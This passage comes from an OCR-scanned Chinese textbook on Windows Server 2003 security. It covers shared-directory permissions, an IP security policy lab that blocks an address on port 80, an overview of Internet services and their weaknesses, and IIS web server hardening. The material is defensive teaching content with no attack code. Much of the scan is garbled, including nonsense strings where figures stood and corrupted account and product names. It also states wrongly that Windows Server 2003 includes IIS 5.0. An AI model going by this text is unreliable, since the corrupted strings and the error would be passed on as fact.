(4) 注销 Administrator 账户 ,以 test 账户 登录 ,再 访问 c: MestVexalmple. txt 文件 ,看 
能 否 访 问 。 再 以 其 他 用 户 身 份 登录 ,看 是 否 可 以 访问 。 


2. 管理 共享 资源 


(1) 添加 新 的 共享 目录 。 

(D 在 “服务 器 管理 器 "对 话 框 中 ,选中 计算 机 名 ,在 该 对 话 框 的 “计算 机 "下拉 列表 框 中 
选择 “共享 目录 ”选项 ,弹出 “共享 目录 ”对 话 框 。 

O 在 “共享 目录 ”对 话 框 中 , 单 击 “ 新 建 共享 ”按钮 ,弹出 “新 建 共享 ”对话 框 , 在 该 对 话 
框 中 输入 共享 名 、 路 径 和 备注 等 信息 。 若 需 设置 允许 同时 连接 到 共享 目录 的 用 户 数 量 , 可 在 
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“用 户 个 数 ”选项 组 中 对 “不 限制 "和 “人 允许” 单 选 按 钮 作出 选择 。 

@ 如 果 选 择 “ 允 许 ” 单 选 按钮 , 需 在 “用 户 ” 空 白 框 中 输入 指定 的 最 大 数量 。 若 需 管 理 组 
和 用 户 的 权限 级 别 , 需 在 该 对 话 框 中 , 单 击 “ 权 限 ? 按 钮 。 

@ 弹出 “通过 共享 访问 的 权限 ”对 话 框 ,从 中 进行 设置 ,然后 单 击 “ 确 定 ” 按 钮 即 可 。 

(2) 修改 共享 目录 。 

O 在 "服务 器 管理 器 "对话 框 中 ,选中 计算 机 名 ,在 该 对 话 框 的 计算机” 下拉 列表 框 中 
选择 “共享 目录 ”选项 。 

Q 在 弹出 的 “共享 目录 ”对 话 框 中 ,从 列表 中 选 定 共 享 目录 名 , 单 击 “ 属 性 ”按钮 。 

© 在 弹出 的 “共享 属性 ?对 话 框 中 , 若 要 更 改 路 径 或 说 明 , 需 在 文本 框 中 输入 新 的 文字 。 
若 要 更 改 可 以 同时 连接 到 共享 目录 的 用 户 最 大 数量 , 需 在 “不 限制 ?或 “允许 单 选 按钮 中 进 
行 选 择 。 如 果 选 择 * 人 允许" 单 选 按钮 , 需 在 其 右边 的 列表 框 中 指定 该 最 大 数量 。 

@ 要 管理 组 和 用 户 的 权限 级 别 , 单 击 “ 权 限 ? 按 钮 ,弹出 “通过 共享 访问 的 权限 ?对话 框 ， 
从 中 修改 权限 之 后 , 单 击 “确定 ”按钮 。 

(3) 设置 已 存在 共享 目录 的 权限 。 

(D 在 “服务 器 管理 器 ?对 话 框 中 ,选中 计算 机 名 ,在 该 对 话 框 的 "计算 机 ”下拉 列表 框 中 
选择 “共享 目录 ”选项 。 

@ 在 弹出 的 “共享 目录 ?对 话 框 中 ,从 列表 中 选 定 共享 目录 名 , 单 击 “属性 ?按钮 。 在 弹 
出 的 “共享 属性 ”对 话 框 中 单 击 “ 权 限 ” 按 钮 ,弹出 “通过 共享 访问 的 权限 ”对 话 框 ,从 中 可 更 改 
下 列 设置 选项 。 

。 要 更 改 权 限 ,从 “名 称 ” 列 表 框 中 选 定 组 或 用 户 账户 ,然后 从 “访问 类 型 "列表 框 中 选 
择 权限 。 
要 将 组 或 用 户 账户 添加 到 共享 目录 的 权限 列表 中 , 单 击 “ 添 加 ”按钮 ,完成 “添加 用 户 
或 组 ”。 要 从 共享 目录 的 权限 列表 中 删除 组 或 用 户 账户 ,在 “名 称 ” 列 表 框 中 选择 组 
或 用 户 , 然 后 单 击 “删除 ”按钮 。 完 成 更 改 后 , 单 击 “ 确 定 ”按钮 。 

(4) 停止 已 存在 的 共享 目录 。 

O 在 “服务 器 管理 器 ?对 话 框 中 ,选中 计算 机 名 ,在 该 对 话 框 的 “计算 机 ?下 拉 列 表 框 中 
选择 “共享 目录 ”选项 。 

Q 在 弹出 的 “共享 目录 ”对 话 框 中 ,从 列表 中 选 定 共享 目录 名 , 单 击 “ 停 止 共 享 ” 按 钮 , 完 
成 操作 。 应 说 明 的 是 目录 本 身 并 未 删除 ,但 是 已 不 能 再 共享 和 被 网 络 用 户 访问 。 


. 


&u 5.2 Windows Server 2003 IP 安全 策略 


【 实 训 目的 】 

掌握 Windows Server 2003 的 本 地 IP 安全 策略 设置 ,禁止 某 IP 地 址 访问 服务 器 。 

【 实 训 环 境 】 

装 有 Windows Server 2003 操作 系统 的 计算 机 两 台 , 其 中 一 台 做 服务 器 。 

【 实 训 内 容 】 

OD 选择 “控制 面板 ”>“ 管 理工 具 ”>“ 本 地 安全 策略 "命令, 单 击 “ 创 建 IP 安全 策略 ” 按 
钮 ,弹出 如 图 5-27 所 示 的 对 话 框 。 
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I 安全 策略 


欢迎 使 用 IP 安全 策略 向 导 


此 向 导 帮 助 你 创建 IP 安全 策 路 。 您 将 指定 对 于 特定 的 
Ir 通信 类 型 ， 和 畦 定 计算 宙 或 计算 机 组 (FEDERAT 
使 用 的 安全 令 别 。 


要 继续 ， 请 单 击 “ 下 一 步 ”。 


图 5-27 Opt IP 安全 策略 


(2) 单 击 * 下 一 步 ?按钮 ,弹出 如 图 5-28 所 示 的 对 话 框 , 单 击 “ 下 一 步 ”按钮 。 


IP 安全 策略 向 导 aixi 
1r 安全 策略 名 称 $ 
命名 这 个 IP 安全 策略 并 且 结 出 一 个 简短 的 描述 
-" 
E] 
fieri, 
ED 


当 有 其 个 生意 ip 持续 攻击 的 时 候 ， 茜 止 他 访问 


<t- 取消 


图 5-28 了 安全 策略 


(3) 直接 单 击 “ 完 成 "按钮 ,如 图 5-29 所 示 。 


下 
正在 完成 IP 安全 策略 向 导 


您 已 成 功 地 完成 指定 您 的 新 IP 安全 策略 的 属性 。 


要 立即 编辑 你 的 IP ZORE, HEF “RARE” 然 
Lr P 


FERRE DD 


请 单 击 “ 完 成 ”来 关闭 此 向 导 。 


«r-so[ za ] mm 


图 5-29 策略 创建 完成 


HmI 
BE MEREEE NT, m 
mi 
(4) 在 图 5-30 PX Rh HOHER RR e d no 
(5) 在 图 5-31 HERE LE TP HER ae RU. 


限制 攻击 ip Et 


适用 于 该 计算 机 与 任何 其 地 i 计 . 
适用 于 该 计算 机 到 任何 其 地 计 . 


图 5-30 添加 向 导 图 5-31 编辑 禁止 IP 


(6) 取消 选中 “使 用 添加 向 导 " 复 选 框 , 单 击 " 添 加 ”按钮 ,如 图 5-32 所 示 。 


图 5-32 添加 禁止 地 址 


CD) 选择 “地 址 ”选项 卡 , 选 中 “镜像 。 与 源 地址 和 目标 地 址 正好 相反 的 数据 包 相 匹配 ”， 
在 “协议 ”选项 卡 中 选择 TCP 80 端口 ,如 图 5-33 所 示 。 

(8) 选择 “筛选 器 操作 ”选项 卡 ,“ 阻 止 " 单 选 按 钮 ,取消 选中 “使 用 ' 添 加 向 导 '” 复 选 框 ， 
单 击 “ 添 加 ”按钮 ,如 图 5-34 所 示 。 

(9) 选中 “禁止 IP" 复 选 框 , 单 击 “ 确 定 ” 按 钮 ,完成 策略 配置 ,如 图 5-35 所 示 。 

(10) 选择 “指派 "策略 ,IP 地 址 为 116. 164. 68.6 的 用 户 就 不 能 访问 服务 器 了 ,如 图 5-36 
所 示 。 
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接受 不 安全 的 通讯 ,但 总 是 
允许 不 安全 的 IF 数据 包 经 过 。 


图 5-33 选择 端口 图 5-34 阻止 80 端口 


禁止 ip 尾 性 


图 5-35 完成 策略 配置 图 5-36 指派 策略 
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Internet 应 用 服务 是 互联 网 提供 的 普遍 服务 ,本 章 介绍 应 用 服务 的 种 类 、Web 服务 的 安 
全 机 制 FTP 服务 的 安全 机 制 ,重点 介绍 Web 服务 的 安全 设置 浏览 器 的 安全 设置 。 


6.1 Internet 应 用 服务 概述 


6.1.1 应 用 服务 的 划分 


Internet 发 展 非常 迅速 ,提供 的 服务 在 不 断 增 加 ,应 用 领域 广泛 ,其 中 提供 的 主要 应 用 
服务 有 以 下 几 种 。 


1. 文件 服务 


可 以 共享 本 地 和 远程 文件 资源 。 在 Windows Server 2003/UNIX/Linux 上 实现 远程 文 
件 共享 。 客 户 端 可 以 通过 文件 系统 的 调用 访问 Web 服务 器 上 的 文件 。 


2. 打印 服务 


用 户 可 以 轻松 地 监视 当地 或 远程 监控 打印 服务 ,在 Windows 2003 上 接受 运行 其 他 操 
作 系 统 (例如 Macintosh UNIX, Linux) 的 机 器 的 打印 任务 。 相 反 , 以 Windows 为 基础 的 客 
户 端 也 能 够 完成 其 他 操作 系统 的 打印 任务 。 


3. Web 服务 


最 初 的 WWW 服务 仅 提供 一 些 文本 ,图片 信息 的 浏览 。 随 着 技术 的 进步 ,目前 WWW 
服务 已 经 和 电子 邮件 服务 .FTP 服务 .多 媒体 服务 和 数据 库 服务 等 紧密 集成 ,通过 浏览 器 收 
发 电子 邮件 和 上 传 下 载 文件 等 已 经 日 益 普 及 ,是 目前 最 重要 的 应 用 服务 。 


4. 电子 邮件 服务 


电子 邮件 服务 是 Internet/Intranet 上 最 经 典 的 服务 。 通 过 申请 一 个 电子 邮件 信箱 ,就 
可 以 向 其 他 拥有 信箱 的 用 户 发 送 文件 .声音 和 图 片 等 。 


5. 终端 服务 


终端 服务 主要 用 于 远程 管理 和 远程 运行 应 用 程序 。 终 端 服务 可 以 允许 用 户 将 基于 
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Windows 的 应 用 或 Windows 桌面 本 身 , 虚 拟 到 任何 计算 机 (包括 那些 不 能 运行 Windows 
的 计算 机 ) 。 

6. 路 由 和 远程 访问 服务 


路 由 和 远程 访问 服务 主要 用 于 构建 网 络 路 由 器 和 远程 访问 服务 器 。 可 以 把 安装 了 
Windows 2003/Linux 的 服务 器 作为 主机 路 由 器 使 用 。 


7. 虚拟 专用 网 (VPN) 服 务 
VPN 服务 用 于 构建 机 密 的 网 络 , 所 有 信息 被 加 密 后 在 网 络 上 进行 传送 。 
8. 域名 服务 


域名 服务 主要 用 于 构建 域名 解析 服务 。 域 名 解析 服务 是 将 网 络 上 一 个 具有 意义 的 字符 
名 称 转换 为 服务 器 的 IP 地 址 的 服务 。 在 浏览 器 中 输入 www. sohu. com 这 样 的 域名 时 ,使 
用 的 就 是 DNS 服务 。 


9. 动态 主机 配置 协议 服务 


动态 主机 配置 协议 服务 主要 用 于 构建 DHCP 服务 。 由 于 Internet 上 的 IP 地 址 资源 有 
限 , 因 此 目前 很 多 拨号 上 网 的 用 户 使 用 随机 分 配 的 IP 地 址 ,这 就 是 DHCP 的 服务 作用 。 


10. 流 媒 体 服务 


发 数字 媒体 内 容 的 服务 器 端 组 件 。 
11. FTP 服务 


FTP(file transfer protocol, 文 件 传输 协议 ) 服 务 用 于 在 计算 机 之 间 方 便 地 传递 文件 。 
FTP 服务 器 上 存储 了 大 量 的 共享 或 免费 软件 和 资料 。 用 户 可 以 根据 需要 连接 到 特定 的 
FTP 服务 器 下 载 文件 ,经 过 授权 的 用 户 还 可 以 向 FTP 服务 器 上 传 文件 。 


12. 代理 服务 


代理 服务 器 实际 上 就 是 一 台 普 通 的 计算 机 ,安装 上 代理 服务 软件 后 ,为 局 域 网 内 的 所 有 
计算 机 提供 连接 Internet 的 代理 。 代 理 服务 器 可 以 将 局 域 网 的 结构 屏蔽 起 来 , Internet. 上 
的 计算 机 不 能 直接 访问 局 域 网 ,同时 可 以 通过 IP 地 址 过 滤 等 方法 限制 局 域 网 内 计算 机 对 
Internet 的 访问 。 


13. 数 字 证 书 服务 (PKI 和 CA) 


在 日 常生 活 中 ,每 个 人 都 有 一 个 唯一 号 码 的 身份 证 ,数字 证 书 的 作用 与 之 类 似 。 它 是 在 
Internet. 上 要 从 事 一 些 需 要 安全 保密 的 工作 时 必 备 的 “个 人 身份 证 ”, 是 由 权威 机 构 发 行 的 ， 
在 网 络 通信 中 标志 通信 各 方 信息 的 一 系列 数据 。 网 络 上 进行 通信 的 各 方 均 在 PKI 中 的 数 
字 证 书 颁发 机 构 申 请 数字 证 书 , 通 过 PKT 系统 建立 的 一 套 严密 的 身份 系统 来 保证 : 信息 在 
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传输 过 程 中 不 被 算 改 ; 发 送 方 能 够 通过 数字 证 书 来 确认 接收 方 的 身份 ; 发 送 方 对 于 自己 的 
信息 不 能 抵赖 。 


6.1.2 Internet 的 安全 
1. 安全 隐患 


Internet 本 身 是 没有 边界 的 ,全 球 的 互联 网 ,不 属于 任何 一 个 组 织 和 任何 一 个 国家 ; 在 
Internet 上 既 没有 法 令 也 没有 法 规 , 人 们 的 行为 几乎 不 受制 约 。 由 于 没有 国际 互联 网 上 通 
行 的 国际 法 规 , 因 此 对 犯罪 没有 处 理 的 依据 。 

Internet 有 很 多 安全 隐患 ,主要 表现 在 以 下 几 方 面 。 四 Internet 是 跨国 界 的 ,黑客 乐于 
进行 跨国 攻击 。@ 通 过 IP 地 址 识别 网 络 上 的 用 户 是 不 可 靠 的 。@ 大 多 数 国 家 都 实行 身份 
证 或 户籍 管理 制度 ,这 种 制度 就 是 把 人 和 他 的 身份 对 应 起 来 ,通过 身份 来 控制 和 管理 个 人 。 
但 在 Internet. 上 ,IP 地 址 只 是 一 个 数字 标志 ,不 代表 实际 身份 ,通过 TP 地 址 来 识别 和 管理 
存在 严重 的 安全 漏洞 。@Internet 本 身 没有 中 央 管理 机 制 , 没 有 法 令 和 法 规 。@Internet 从 
技术 上 来 讲 是 开放 的 ,标准 的 ,是 为 君子 设计 而 不 防 小 人 的 。@Internet 没有 审计 和 记录 功 
能 , 即 对 发 生 的 事情 没有 记录 。 

2. 产生 的 原因 

1) 薄弱 的 认证 环节 

Internet 的 许多 安全 隐患 是 因为 使 用 了 薄弱 的 、 静 态 的 密码 。Internet 上 的 密码 可 以 通 
过 许多 方法 破译 。 其 中 最 常用 的 两 种 方法 是 把 加 密 的 密码 解密 和 通过 监视 信道 窃取 密码 。 
UNIX/Linux 操作 系统 通常 把 加 密 的 密码 保存 在 一 个 文件 中 ,而 普通 用 户 也 可 读 取 该 文件 ， 
这 个 密码 文件 可 以 通过 简单 的 复制 或 其 他 方法 得 到 。 一 大 密码 文件 被 部 入 者 得 到 ,他 们 就 
可 以 使 用 解密 程序 。 如 果 密 码 是 薄弱 的 ,如 少 于 8 个 字符 或 英语 单词 ,就 可 能 破译 ,然后 用 
来 获取 对 系统 的 访问 权 。 

有 一 些 TCP 或 UDP 服务 只 能 对 主机 地 址 进行 认可 ,而 不 能 对 指定 的 用 户 进行 认证 。 
例如 ,网 络 文件 系统 (network file system,NFS) 服 务 器 不 能 做 到 只 给 一 个 主机 上 的 某 些 特 
定 用 户 访问 权 。 它 只 能 给 整个 主机 服务 器 。 在 该 系统 中 ,假如 一 个 服务 器 的 管理 员 也 许 只 
信任 某 一 主机 的 某 一 特定 用 户 , 并 希望 该 用 户 拥有 访问 权 ; 但 是 管理 员 无 法 控制 该 主机 上 
的 其 他 用 户 , 也 就 是 说 只 能 允许 所 有 的 用 户 访问 或 禁止 所 有 用 户 访问 。 

2) 系统 的 易 被 监视 性 

当 用 户 使 用 TELNET 或 FTP 连接 到 主机 上 的 账户 时 ,在 Internet 上 传输 的 密码 是 没 
有 加 密 的 ,那么 侵入 系统 的 一 个 方法 就 是 通过 监听 获取 带 用 户 名 和 密码 的 IP 包 , 然 后 使 用 
这 些 用 户 名 和 密码 ,登录 到 系统 。 如 果 截 获 的 是 管理 员 的 密码 ,那么 获取 特权 访问 就 变 得 更 
为 容易 了 ,当前 有 很 多 系统 已 经 被 这 种 方法 侵入 。 

大 多 数 用 户 不 加 密 邮件 ,而 且 许多 人 认为 电子 邮件 是 安全 的 ,所 以 用 它 来 传递 敏感 的 内 
容 。 因 此 电子 邮件 可 以 被 监视 从 而 泄露 敏感 信息 。X-Windows 系统 同样 也 存在 已 被 监视 
的 弱点 。X-Windows 系统 允许 在 一 台 工作 站 上 打开 多 重 窗口 来 显示 图 形 或 多 媒体 应 
闻 和 者 有 时 可 以 在 另外 的 系统 上 打开 窗口 来 读 取 可 能 含有 密码 或 其 他 敏感 信息 的 文件 。 
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3) 网 络 系统 易 被 欺骗 性 

Internet. 上 的 主机 都 是 通过 IP 地 址 进行 访问 的 。 如 果 使 用 了 IP 地 址 欺骗 ,那么 攻击 
者 的 主机 就 可 以 冒充 一 个 被 信任 的 主机 或 客户 从 而 侵入 系统 。 

一 个 简单 的 方法 是 等 用 户 系 统 关 机 后 来 模仿 该 系统 。 在 许多 组 织 中 ,经 常 使 用 UNIX 
主机 作为 局 域 网 服务 器 ,员工 用 个 人 计算 机 和 TCP/IP 网 络 软件 来 连接 和 使 用 它们 。 个 人 
计算 机 一 般 使 用 NFS 来 对 服务 器 的 目录 和 文件 进行 访问 (NFS 仅仅 使 用 TP 地 址 来 验证 客 
户 )。 一 个 攻击 者 在 几 小 时 内 就 可 以 放置 好 一 台 与 别人 使 用 相同 名 字 和 IP 地 址 的 个 人 计算 
机 ,然后 与 UNIX 主机 建立 连接 ,就 好 像 他 是 “ 真 的 "客户 ,这 是 非常 容易 实现 的 攻击 手段 ， 
一 般 是 内 部 人 员 所 为 。 

4) 复杂 的 设备 和 控制 

对 主机 系统 的 访问 控制 通常 很 复杂 而 且 难 于 验证 其 正确 性 。 因 此 ,偶然 的 配置 错误 会 
使 间 和 人 者 获取 访问 权 。 

许多 Internet. 上 的 安全 事故 的 起 因 是 由 那些 被 闻 入 者 发 现 的 弱点 造成 的 。 由 于 目前 大 
多 数 Linux 系统 都 采用 开放 源 代码 方式 开发 ,而 源 代码 又 可 以 轻易 得 到 ,所 以 奖 入 者 可 以 通 
过 研究 其 中 可 利用 的 缺陷 来 侵入 系统 。 存 在 缺陷 的 部 分 原因 是 软件 的 复杂 性 ,因而 没有 能 
力 在 各 种 环境 中 进行 测试 。 有 些 软件 缺陷 很 容易 被 发 现 和 修改 ; 而 另 一 些 缺 陷 只 能 重 写 该 
软件 才能 被 更 正 。 

5) 通信 协议 存在 安全 问题 

网 络 通 信 的 基础 是 协议 ,TCP/IP 是 目前 国际 上 最 流行 的 网 络 协议 。 该 协议 在 设计 时 
没有 过 多 考虑 安全 因素 。 主 要 原因 是 如 果 考 虑 安全 因素 太 多 ,将 会 增 大 代码 量 , 从 而 降低 
TCP/IP 的 运行 效率 。TCP/IP 在 设计 上 就 是 不 安全 的 ,黑客 利用 一 些 伪造 的 IP 发 送 地 址 ， 
制造 一 些 虚假 的 数据 分 组 来 充当 合法 工作 站 发 送 的 分 组 。 其 他 还 有 UDP Ho. TCP 序列 
号 攻击 ICMP ZIP 碎片 袭击 等 。 


6.2 Web 服务 的 安全 


WWW 服务 又 称 Web 服务 ,是 建立 在 HTTP( 超 文本 传输 协议 ) 上 的 全 球 信 息 库 ,是 
Internet 上 HTTP 服务 器 的 集合 ,在 短 时 间 内 得 到 迅猛 发 展 ,是 人 们 最 常用 的 Internet 服 
务 。 目 前 Web 站 点 遍及 世界 各 地 ,万 维 网 用 超 文本 技术 把 Web 站 点 上 的 文件 链接 在 一 起 ， 
文件 可 以 包括 文本 图形 声音 、 视 频 以 及 其 他 形式 。 用 户 可 以 自由 地 通过 超 文本 导航 从 一 
个 文件 进入 另 一 个 文件 ,方便 搜索 信息 。 不 管 文件 在 哪里 ,只 要 在 HTTP 连接 的 字 或 图 上 
单 击 就 行 了 。 

搜索 Web 文件 的 工具 是 浏览 器 ,常用 的 浏览 器 是 Netscape Navigator 和 Microsoft 
Internet Explorer; HTTP 只 是 浏览 器 中 使 用 的 一 种 协议 ,浏览 器 还 会 使 用 FTP、 
GOPHER,WAIS 等 协议 ,也 会 包括 NNTP 和 SMTP 等 协议 。 因 此 , 当 用 户 在 使 用 浏览 器 
时 ,实际 上 是 通过 HTTP 申请 服务 ,也 会 去 申请 FTP.GOPHER, WAIS, NNTP ftl SMTP 
等 服务 器 。 这 些 服务 器 都 存在 漏洞 ,是 不 安全 的 。 

浏览 器 由 于 灵活 而 备 受用 户 的 欢迎 ,而 灵活 性 也 会 导致 控制 困难 。 浏 览 器 比 FTP 服务 
器 更 容易 转换 和 执行 ,但 是 一 个 恶意 的 侵入 也 就 更 容易 得 到 转换 和 执行 。 浏 览 器 一 般 只 能 
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理解 如 HTML 格式 JPEG 和 GIF 图 形 格式 等 数据 格式 ,对 其 他 的 数据 格式 ,浏览 器 是 通过 
外 部 程序 来 观察 的 。 一 定 要 注意 哪些 外 部 程序 是 默认 的 ,不 能 允许 那些 危险 的 外 部 程序 进 
站 点 。 用 户 不 要 随便 增加 外 部 程序 ,不 要 轻信 陌生 人 的 建议 而 随便 地 进行 个 性 化 外 部 程序 
的 配置 。 

大 部 分 Web 站 点 注意 的 只 是 站 点 内 容 的 安全 。 但 是 通过 WWW 会 引入 外 部 文件 和 程 
序 , 通 过 超 文本 会 进入 其 他 站 点 的 文本 。 它 们 一 般 对 这 些 文本 和 程序 的 安全 性 考虑 得 很 少 ， 
因此 会 带 来 很 多 安全 问题 。 


6.2.1 IIS-Web 安全 设置 


为 了 适应 目前 Internet/Intranet 的 潮流 ,各 公司 纷纷 推出 自己 的 WWW 信息 发 布 产 
品 ,微软 公司 也 不 例外 。 在 微软 公司 推出 的 一 系列 应 用 产品 和 开发 工具 中 ,有 许多 是 免费 提 
供给 用 户 使 用 的 ,从 而 占有 很 大 的 市 场 份 额 。 在 这 些 免 费 产 品 中 ,有 一 套 名 为 IIS(Internet 
Information Server) 的 Web 服务 器 组 件 。 在 Windows Server 2003 版 内 置 了 IIS 5.0 版 本 ， 
用 户 也 可 以 直接 从 微软 的 网 站 下 载 。 

Windows 2003 的 系统 管理 员 可 以 使 用 TIS 建立 起 大 容量 ,功能 强大 的 WWW、FTP 和 
SMTP 服务 器 。 从 而 拥有 属于 自己 的 安全 的 Internet 和 Intranet 网 站 , 它 可 以 将 信息 发 布 
给 全 世界 的 用 户 。 

正 由 于 IIS 的 安全 性 以 Windows Server 2003 系统 作为 基础 ,如 果 TIS 系统 被 攻击 ,也 
就 意味 着 Windows 2003 齐 到 了 入 侵 , 因 此 加 强 IS 的 安全 是 必要 的 。 


1. lIS 的 安全 设置 


设置 IIS 要 注意 以 下 几 点 。 

(1) 避免 安装 在 主 域 控制 器 上 。 安 装 IIS 后 ,将 在 安装 的 计算 机 上 生成 IUSR 
Computername 匿名 账户 (Computername 为 服务 器 的 名 字 ) ,该 账户 被 添加 到 域 用 户 组 中 ， 
从 而 把 应 用 于 域 用 户 组 的 访问 权限 提供 给 访问 Web 服务 器 的 每 个 匿名 用 户 ,这 不 仅 给 TIS 
带 来 了 巨大 的 潜在 危险 ,而且 还 可 能 牵扯 到 整个 域 资 源 的 安全 ,因此 要 尽 可 能 避免 把 TIS 安 
装 在 域 控 制 器 上 ,尤其 是 主 域 控制 器 。 

(2) 避免 安装 在 系统 分 区 上 。 把 TIS 安装 在 系统 分 区 上 ,会 使 系统 文件 与 IS 同样 面临 
非法 访问 ,容易 使 非法 用 户 侵入 系统 分 区 。 

(3) 通过 使 用 数字 与 字母 (包括 大 小 写 ) 相 结合 的 密码 ,提高 修改 密码 的 频率 ,封锁 失败 
的 登录 尝试 以 及 账户 的 生存 期 等 ,对 一 般 用 户 账户 进行 管理 。 

(4) 端口 安全 性 的 实现 。 对 于 TIS 服务 ,无 论 是 WWW 站 点 .FTP 站 点 ,还 是 NNTP, 
SMTP 服务 等 都 有 各 自 监听 和 接收 浏览 器 请 求 的 TCP 端口 号 (port) ,一 般 常用 的 端口 号 : 
WWW 是 80,FTP 是 21,SMTP 是 25, 可 以 通过 修改 端口 号 来 提高 IIS 服务 器 的 安全 性 。 如 果 
修改 了 端口 设置 ,只 有 知道 端口 号 的 用 户 才 可 以 访问 ,但 用 户 在 访问 时 需要 指定 新 端口 号 。 


2. lIS-Web 服务 器 的 安全 性 


Web 服务 器 是 IIS 中 一 个 强 有 力 的 功能 全 面 的 工具 , 它 优 于 其 他 同类 产品 。 作 为 
Windows Server 2003 下 的 一 项 服务 运行 时 ,能 为 各 种 规模 的 网 络 提供 快速 .方便 、 安 全 的 
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Web 服务 功能 。 如 果 计划 建立 Web 网 站 ,要 确保 Web 网 站 及 其 内 容 的 安全 和 网 络 及 其 资 
源 的 安全 ,除了 在 前 面 提 到 的 IIS 安全 措施 外 ,还 要 采取 其 他 相应 的 手段 。 
1) 登录 认证 的 安全 
IIS-Web 服务 器 对 用 户 提供 3 种 形式 的 身份 认 rms 3 
证 ,如 图 6-1 所 示 。 DES 
UHEETEIBPZNB. 


(1) 匿名 访问 方式 。 匿 名 访问 就 是 不 用 验证 ， | emer 
用 户 并 不 需要 输入 用 户 名 和 密码 ,都 是 使 用 一 个 匿 | so Em 


so: 
名 账号 登录 网 站 。 在 这 3 种 身份 认证 中 的 安全 性 允许 TS RHEB QD 

是 最 低 的 ,可 以 禁止 匿名 访问 方式 。 默 认 的 匿名 账 | | eT 
号 的 格式 是 IUSR_ 主 机 名 。 -re 


(2) 基本 身份 验证 方法 。 目 前 公司 主页 网 站 设 | Duns aes 

置 为 基础 验证 ,而 且 不 允许 匿名 访问 ,所 以 浏览 器 BURD: REL 
浏览 公司 主页 网 站 时 ,需要 拥有 Windows 2003 suo: [zi 
Server 的 用 户 账号 和 密码 ,浏览 器 会 出 现 一 个 “ 输 ME EIS EF TE 
人 网 络 密码 ”对话 框 ,输入 用 户 名 和 密码 后 ,输入 的 

数据 会 送 到 Web 服务 器 进行 基本 验证 ,身份 无 误 图 6-1 身份 验证 方法 

后 才能 进入 Web 站 点 的 首页 。 

(3) 集成 Windows 身份 验证 方式 。 集 成 Windows 身份 验证 与 基本 身份 验证 方法 相 
同 , 只 是 对 传送 的 数据 会 进行 加 密 保护 ,目前 只 有 Internet Explorer 浏览 器 支持 这 种 验证 方 
式 。 集 成 验证 与 基本 验证 不 同 的 地 方 ,在 登录 网 站 时 ,并 不 会 马上 显示 用 户 输入 网 络 密码 的 
对 话 框 ,而 是 先 以 客户 端的 用 户 信 息 进行 验证 。 如 果 客 户 端 用 户 没 有 足够 的 权限 , 才 会 显示 
输入 密码 的 对 话 框 。 

首先 需要 了 解 匿名 访问 的 严重 后 果 , 并 采取 预防 措施 来 确保 为 匿名 访问 创建 的 账户 拥 
有 适应 的 许可 权 。 若 要 设置 用 户 对 Web 服务 器 进行 访问 的 类 型 ,可 在 TIS 服务 管理 器 中 双 
id; WWW, 调 出 Web 服务 器 再 双击 Web 服务 器 ,以 显示 Web 属性 对 话 框 。 在 对 话 框 中 可 
以 看 到 ,设置 Web 服务 器 服务 程序 可 以 使 用 多 种 选项 。 对 于 安装 的 大 多 数 IIS 而 言 ,默认 
选项 最 好 。 

如 果 希 望 允许 大 众 进行 访问 ,一 定 要 确保 同意 匿名 访问 。 按 照 默认 设置 , 当 TIS 安装 好 
后 ,在 用 户 数 据 库 就 会 创建 一 个 新 用 户 账户 ,其 名 字 为 IUSR_, 后 接 已 安装 好 的 服务 器 名 。 
例如 ,如 果 服 务 器 名 为 FS, 新 用 户 账户 则 为 ITUSR_FR。 当 账户 创建 好 , 它 被 赋予 有 限 的 访 
问 权 , 并 增加 到 域 用 户 、 客 人 用 户 和 Everyone 组 中 。 

此 外 ,IUSR 账户 被 赋予 在 本 地 登录 的 权限 。 所 有 Web 用 户 都 必须 具有 这 种 权限 , 原 
因 是 他 们 的 请 求 被 传送 至 Web 服务 器 服务 程序 ,该 服务 程序 利用 他 们 的 账户 去 登录 ,接着 
允许 Windows 2003 分 配 相应 的 访问 权 。 

如 果 希 望 所 有 用 户 按照 特定 的 用 户 账户 和 密码 得 到 验证 , 仅 取 消 选中 Anonymous 
Logon( 匿 名 登录 ) 复 选 框 即 可 。 那 将 要 求 各 用 户 在 访问 服务 器 的 资源 前 输入 有 效 的 用 户 ID 
和 密码 。 如 果 能 启动 启示 功能 ,就 能 查看 到 谁 正在 访问 Web 服务 器 以 及 他 们 所 进行 的 操作 。 

2) 设置 用 户 审核 

安装 在 NTFS 文 件 系统 上 的 文件 夹 和 文件 ,一 方面 要 对 其 权限 加 以 控制 ,对 不 同 的 用 
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户 组 和 用 户 进行 不 同 的 权限 设置 。 另 一 方面 ,还 可 利用 NTFS 的 审核 功能 对 某 些 特定 用 户 
组 成 员 读 文件 的 企图 等 方面 进行 审核 ,有 效 地 通过 监视 如 文件 访问 .用户 对 象 的 使 用 等 发 现 
非法 用 户 进行 非法 活动 的 前 兆 , 以 及 时 加 以 预防 制止 ,如 图 6-2 所 示 。 

3) 设置 WWW 目录 的 访问 权限 

对 已 经 设置 Web 目录 的 文件 夹 , 可 以 通过 操作 ”Web 站 点 ”选项 卡 实现 对 WWW 目录 
访问 权限 的 控制 ,而 该 目录 下 的 所 有 文件 和 子 文件 夹 都 将 继承 这 些 安全 性 。WWW 服务 除 
了 提供 NTFS 文 件 系 统 提 供 的 权限 外 ,还 提供 读 取 权限 ,允许 用 户 读 取 或 下 载 WWW 目录 
中 的 文件 ; 执行 权限 ,允许 用 户 运 行 WWW 目录 下 的 程序 和 脚本 ,如 图 6-3 所 示 。 


Aa |si mta FAR [xis | 目录 安全 性 | rT? k BELA] 
ESSIRERIDAERIS 
RGHRLEDBSE QJ 
Ed 加 另 一 人 计算 机 上 的 共享 @) 
遍历 文件 天 /运行 文件 ORBI mU 


列 出 文件 夹 / 读 职 数据 [e inetpublerrroot si 
读 职 属性 EROS V) 
[ossis m 


CD 
(ERG. 


LL T] 


ET 
图 6-2 设置 审核 图 6-3 在 “ 主 目录 ”选项 卡 中 设置 权限 


为 确保 网 站 的 安全 性 ,配置 Web 服务 器 可 以 看 到 的 目录 以 及 相应 的 访问 层次 也 是 很 重 
要 的 。 第 一 次 安装 TIS 时 ,按照 默认 设置 , 它 会 自行 创建 一 个 名 为 InetPub 的 目录 ,接着 为 
其 提供 的 Internet 服务 生成 根 目录 。Web 服务 器 的 根 目录 默认 为 wwwroot, 它 应 当 是 主页 
所 在 的 位 置 。 接 着 可 以 用 Directories 标签 来 增加 存储 额外 内 容 的 新 目录 。 

4) IP 地 址 的 控制 

